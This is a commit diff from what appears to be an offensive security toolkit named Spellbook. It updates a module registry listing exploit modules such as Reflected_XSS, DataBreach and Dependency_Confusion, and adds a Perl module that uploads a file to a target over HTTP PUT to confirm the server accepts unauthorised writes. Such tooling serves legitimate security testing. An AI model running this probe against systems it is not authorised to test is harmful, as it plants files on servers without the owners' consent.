new modules aroung aws s3 buckets

.config/modules.json

@@ -206,9 +206,9 @@
         },
         {
             "id": "0035",
-            "category": "exploit",
-            "module": "S3_Misconfig",
-            "description": "Upload files into AWS S3 Buckets with weak security policies"
+            "category": "parser",
+            "module": "S3_Bucket",
+            "description": "Extract the path of files from a S3 Bucket with object listing"
         },
         {
             "id": "0036",
@@ -238,7 +238,7 @@
             "id": "0040",
             "category": "exploit",
             "module": "Reflected_XSS",
-            "description": ""
+            "description": "PoC"
         },
         {  
             "id": "0041",
@@ -268,13 +268,13 @@
             "id": "0045",
             "category": "recon",
             "module": "Detect_Error",
-            "description": ""
+            "description": "PoC"
         },
         {  
             "id": "0046",
             "category": "exploit",
             "module": "DataBreach",
-            "description": ""
+            "description": "PoC"
         },
         {  
             "id": "0047",
@@ -299,6 +299,30 @@
             "category": "exploit",
             "module": "S3_Bucket_Takeover",
             "description": "Detection possible of takeover on AWS S3 Bucket resource"
+        },
+        {  
+            "id": "0051",
+            "category": "exploit",
+            "module": "Upload_Via_PUT",
+            "description": ""
+        },
+        {
+            "id": "0052",
+            "category": "exploit",
+            "module": "Open_Redirect",
+            "description": "Detect application vulnerable"
+        },
+        {
+            "id": "0053",
+            "category": "exploit",
+            "module": "Dependency_Confusion",
+            "description": ""
+        },
+        {
+            "id": "0054",
+            "category": "parser",
+            "module": "Nozaki",
+            "description": ""
         }
     ]
 }

lib/Spellbook/Exploit/Upload_Via_PUT.pm

@@ -0,0 +1,46 @@
+package Spellbook::Exploit::Upload_Via_PUT {
+    use strict;
+    use warnings;
+    use Spellbook::Core::UserAgent;
+    use Spellbook::Helper::Generate_UUID;
+
+    sub new {
+        my ($self, $parameters) = @_;
+        my ($help, $target, @result);
+
+        Getopt::Long::GetOptionsFromArray (
+            $parameters,
+            "h|help"     => \$help,
+            "t|target=s" => \$target
+        );
+
+        if ($target) {
+            if ($target !~ /^http(s)?:\/\//) {
+                $target = "https://$target";
+            }
+
+            my $userAgent = Spellbook::Core::UserAgent -> new();
+            my @uuid      = Spellbook::Helper::Generate_UUID -> new(["--version" => 4]);
+            my $upload    = $userAgent -> put("$target/$uuid[0].txt", Content => "$uuid[0]");
+            my $request   = $userAgent -> get("$target/$uuid[0].txt");
+
+            if (($request -> code() == 200) && ($request -> content() eq "$uuid[0]")) {
+                push @result, "$target/$uuid[0].txt\n";
+            }
+
+            return @result;
+        }
+
+        if ($help) {
+            return "
+                \rRecon::Explioit
+                \r=====================
+                \r-h, --help     See this menu
+                \r-t, --target   Define\n\n";
+        }
+
+        return 0;
+    }
+}
+
+1;

lib/Spellbook/Parser/Bucket.pm → lib/Spellbook/Parser/S3_Bucket.pm

@@ -1,4 +1,4 @@
-package Spellbook::Parser::Bucket {
+package Spellbook::Parser::S3_Bucket {
     use strict;
     use warnings;
     use XML::Simple;